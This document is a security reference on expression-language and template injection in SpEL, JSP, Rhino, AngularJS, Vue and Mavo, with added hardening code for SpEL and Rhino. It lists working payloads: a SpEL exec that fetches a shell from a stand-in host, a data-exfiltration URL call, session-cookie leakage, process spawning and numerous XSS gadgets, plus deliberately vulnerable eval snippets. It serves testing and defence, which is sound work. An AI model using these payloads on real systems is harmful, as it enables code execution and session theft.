Template Injection

Expression Language/Template Injection

Used in JSP 2.0/2.1, Jakarta, OGNL, MVEL, SpEL

Example:

<c:out value="${person.address.street}"/>

Spring Expression Language (SpEL)

Echo Foo Parameter:

<spring:message scope="${param.foo}"/>

Testing:

${"aaaa"}
${99999+1}
T(java.lang.Runtime).getRuntime().exec("wget http://evil.com/shell.jsp")
(new java.util.Scanner((T(java.lang.Runtime).getRuntime().exec("uname -a").getInputStream()),"UTF-8")).useDelimiter("\\A").next()
new java.net.URL("http://evil.com/ex?data="+??).openConnection().getInputStream().readLine()

Data Leakage:

${applicationScope}
${requestScope}
http://vulnerable.com/spring/foo?param=${cookie["JSESSIONID"].value}

Example Vulnerable Code

import org.springframework.expression.*;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;

ExpressionParser parser = new SpelExpressionParser();
// StandardEvaluationContext exposes the full language: T() type references, method calls, constructors
StandardEvaluationContext testContext = new StandardEvaluationContext(TEST_PERSON);
Expression exp = parser.parseExpression(dynamicValue); // dynamicValue is request-controlled, e.g. name = 'Bob'
String valueExtracted = exp.getValue(testContext, String.class);

How to fix

Per page Fix:

<%@ page isELIgnored="true" %>

Per App Fix:

<context-param>
     <description>Spring Expression Language Support</description>
     <param-name>springJspExpressionSupport</param-name>
     <param-value>false</param-value>
</context-param>
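Both fixes above act on JSP EL and on Spring's JSP tag library; neither affects code that evaluates SpEL programmatically, as the vulnerable snippet above does. For that case the mitigation is to evaluate with SimpleEvaluationContext, which exposes only property access on the root object and rejects T() type references, constructors, method invocation and bean references. The following is an added example, not code from the original page; Person and the probe expression are constructed stand-ins for TEST_PERSON and dynamicValue.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.EvaluationException;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpelContextDemo {

    // Constructed stand-in for the page's TEST_PERSON root object.
    public static class Person {
        private final String name;
        public Person(String name) { this.name = name; }
        public String getName() { return name; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // As on the page: StandardEvaluationContext hands the full language to whoever
    // controls dynamicValue (type references, constructors, method calls, bean lookups).
    public static String evalUnsafe(String dynamicValue, Person root) {
        Expression exp = PARSER.parseExpression(dynamicValue);
        return exp.getValue(new StandardEvaluationContext(root), String.class);
    }

    // Hardened: SimpleEvaluationContext only resolves properties on the root object.
    // Anything beyond data binding fails at evaluation time with a SpelEvaluationException.
    public static String evalRestricted(String dynamicValue, Person root) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        Expression exp = PARSER.parseExpression(dynamicValue);
        return exp.getValue(ctx, root, String.class);
    }

    public static void main(String[] args) {
        Person bob = new Person("Bob");

        // Legitimate data binding works under the restricted context.
        System.out.println(evalRestricted("name", bob)); // Bob

        // A T() probe in the style of the page's test payloads (harmless one chosen here)
        // parses fine but is rejected when evaluated in the restricted context.
        String probe = "T(java.lang.System).getProperty('java.version')";
        try {
            evalRestricted(probe, bob);
        } catch (EvaluationException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Swapping StandardEvaluationContext for SimpleEvaluationContext is usually a one-line change in the evaluating code, and is the fix to apply whenever the expression string itself, not just the values it refers to, can be influenced by a request.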

ScriptEngine / Rhino

Testing:

new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()

Example Vulnerable Code

Example 1:

import org.mozilla.javascript.*;

Context cx = Context.enter();
[...]
// dynamicCodeHere is attacker-controlled; with no ClassShutter the script can reach any Java class
cx.evaluateString(scope, dynamicCodeHere, "", 1, null);

Example 2:

import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;

ScriptEngineManager scriptEngineManager = new ScriptEngineManager();
ScriptEngine scriptEngine = scriptEngineManager.getEngineByExtension("js");

// Untrusted input is evaluated with full access to the JVM (no class filtering on the engine)
Object result = scriptEngine.eval(dynamicCodeHere);
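Where untrusted script must be evaluated at all, the Rhino-side mitigation for Example 1 is a ClassShutter installed on the Context before the scope is built: every Java class not on the allow list becomes invisible to script code, so the ProcessBuilder and Runtime probes above fail with a script-level TypeError instead of reaching the JVM. This is an added example, not code from the original page; the allow list and the probe script are constructed for illustration.

```java
import org.mozilla.javascript.ClassShutter;
import org.mozilla.javascript.Context;
import org.mozilla.javascript.RhinoException;
import org.mozilla.javascript.Scriptable;

public class RhinoShutterDemo {

    // Constructed allow list: scripts may touch java.lang.String and java.util.*; everything
    // else (java.lang.Runtime, java.lang.ProcessBuilder, java.io.*, ...) is hidden.
    private static final ClassShutter ALLOW_LIST =
            fullClassName -> fullClassName.equals("java.lang.String")
                          || fullClassName.startsWith("java.util.");

    // Evaluate a script in a fresh Context with the shutter installed.
    public static Object evalWithShutter(String dynamicCodeHere) {
        Context cx = Context.enter();
        try {
            // Install before initStandardObjects(); Rhino throws SecurityException if a
            // shutter is already present on this Context, so use a freshly entered one.
            cx.setClassShutter(ALLOW_LIST);
            Scriptable scope = cx.initStandardObjects();
            Object result = cx.evaluateString(scope, dynamicCodeHere, "<user-input>", 1, null);
            return Context.jsToJava(result, Object.class);
        } finally {
            Context.exit();
        }
    }

    public static void main(String[] args) {
        // Benign script using an allowed class: runs and returns 0.
        System.out.println(evalWithShutter("new java.util.ArrayList().size()"));

        // Probe in the style of the page's payloads (a harmless call chosen here):
        // java.lang.Runtime is hidden, so the call fails inside the script.
        String probe = "java.lang.Runtime.getRuntime().availableProcessors()";
        try {
            evalWithShutter(probe);
        } catch (RhinoException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```

A ClassShutter only restricts which Java classes scripts can see; it does not bound CPU or memory use and does not make evaluating user-supplied code safe in general, so treat it as defence in depth for Example 1 rather than a sandbox. For Example 2, Nashorn offers the analogous ClassFilter, obtained by creating the engine through NashornScriptEngineFactory.getScriptEngine(ClassFilter) instead of ScriptEngineManager.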

Jinja

https://portswigger.net/research/server-side-template-injection

AngularJS

Examples:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

VueJS

https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets

Examples:

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

V3 Examples:

{{_openBlock.constructor('alert(1)')()}}

V2 Examples:

{{constructor.constructor('alert(1)')()}}

Mavo

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]